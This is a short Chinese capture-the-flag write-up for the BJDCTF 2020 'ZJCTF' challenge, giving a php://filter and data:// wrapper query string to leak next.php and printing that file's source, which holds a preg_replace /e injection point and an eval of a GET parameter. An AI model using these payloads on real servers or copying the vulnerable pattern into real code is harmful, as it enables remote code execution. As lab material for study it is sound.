Ting

Ting

满怀希望就会所向披靡

【BJDCTF 2020】ZJCTF,不过如此

[BJDCTF 2020]ZJCTF,不过如此

思路

  • 进入后是一个GET传参,利用php伪协议得到next.php内容
  • next.php是一个php的preg_replace /e 模式漏洞利用,执行RCE
  • 其中有一些部分需要绕过,最终执行命令得到flag

EXP

  • ?text=data://text/pain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
  • 得到next.php内容
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

其中的preg_replace /e 存在漏洞。

0%